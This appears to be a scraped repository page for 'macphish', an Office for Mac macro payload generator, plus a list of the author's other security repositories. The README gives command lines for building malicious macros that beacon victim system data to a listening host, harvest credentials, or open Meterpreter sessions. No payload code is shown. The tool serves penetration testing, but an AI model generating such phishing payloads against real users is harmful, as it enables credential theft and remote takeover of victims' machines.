• Stars
    star
    233
  • Rank 172,230 (Top 4 %)
  • Language
    Python
  • License
    MIT License
  • Created almost 8 years ago
  • Updated about 7 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Office for Mac Macro Payload Generator

macphish

Office for Mac Macro Payload Generator macphish

Attack vectors

There are 4 attack vectors available:

  • beacon
  • creds
  • meterpreter
  • meterpreter-grant

For the 'creds' method, macphish can generate the Applescript script directly, in case you need to run it from a shell.

beacon

On execution, this payload will signal our listening host and provide basic system information about the victim. The simplest way of generating a beacon payload is:

$./macphish.py -lh <listening host> 

By default, it uses curl but other utilities (wget, nslookup) can be used by modifying the command template.

creds

$./macphish.py -lh <listening host> -lp <listening port> -a creds

meterpreter

The simplest way of generating a meterpreter payload is:

$./macphish.py -lh <listening host> -lp <listening port> -p <payload> -a meterpreter 

meterpreter-grant

The generate a meterpreter payload that calls GrantAccessToMultipleFiles() first:

$./macphish.py -lh <listening host> -lp <listening port> -p <payload> -a meterpreter-grant

For meterpreter attacks, only python payloads are supported at the moment.

Usage

See https://github.com/cldrn/macphish/wiki/Usage

PoCs

More Repositories

1

nmap-nse-scripts

My collection of nmap NSE scripts
Lua
948
star
2

rainmap-lite

Rainmap Lite - Responsive web based interface that allows users to launch Nmap scans from their mobiles/tablets/web browsers!
Python
230
star
3

InsecureProgrammingDB

Insecure programming functions database
Batchfile
102
star
4

davtest

davtest (improved)- Exploits WebDAV folders
Perl
101
star
5

codeql-queries

My CodeQL queries collection
CodeQL
93
star
6

external-nse-script-library

External NSE script library (Collection of unofficial scripts) - Feel free to submit your NSE scripts!
Lua
28
star
7

dnmap

Fork of Dnmap (http://dnmap.sourceforge.net/)
Python
22
star
8

pentesting

Misc resources for my daily pentesting...
PowerShell
18
star
9

mac2wepkey-scanner

huawei mac2wepkey scanner
Python
16
star
10

cakephpids

PHPIDS plugin implementation for CakePHP
PHP
15
star
11

cidrToIps

reads a list of IP ranges in CIDR notation and prints the individual IP addresses.
Python
14
star
12

wardrive-analytics

Wardrive analytics: Generates a visual representation of your wardriving logs
JavaScript
11
star
13

metasploit-modules

My metasploit modules
Ruby
10
star
14

security-advisories

My security advisories
CodeQL
10
star
15

url-collector-telegram

Bot that automatically stores URLs shared in Telegram chats/groups
Lua
9
star
16

8dot3-brute

8dot3-brute is a script to brute force Windows 8.3 filenames and directories in web servers
Python
9
star
17

ocsp-preparation

My OSCP preparation toolkit/knowledge base
6
star
18

android-exploitation

Some PoCs of exploits for Android vulnerabilities
Java
5
star
19

hmi-port-list

HMI port list
4
star
20

crowdstriked

Useful files when using Crowdstrike Real Time Response API
PowerShell
3
star
21

cakephpids-component

Component Implementation of PHPIDS for CakePHP
PHP
3
star
22

dotdotpwn

My unofficial/testing copy of dotdotpwn
Perl
3
star
23

ctf4-codeql-and-chill-java

My attempt solution for GitHub Security Lab CTF 4: CodeQL and Chill - The Java Edition
CodeQL
2
star
24

practical-iot-hacking

C
2
star
25

bcbus

BCBus - Android application for viewing BC Transit schedules in British Columbia
Java
2
star
26

recaptcha-cakephp

reCaptcha implementation for CakePHP 1.3
PHP
2
star
27

polarisoffice-filemon

PoC of Android app that abuses a content provider with sensitive information and null read permissions to steal files listed in PolarisOffice's recent files tab
Java
2
star
28

lgtm-test

C
1
star
29

lector-bunsen

Lector del comic Bunsen (http://heroeslocales.com/bunsen) para Android ( Basado en ComicViewer )
Java
1
star
30

dcs

default credential scanner
1
star
31

enum4linux-0.9

enum4linux-0.9 Unofficial
Perl
1
star
32

sinfonier

Repositorio para concurso de sinfonier en cpmx5
Java
1
star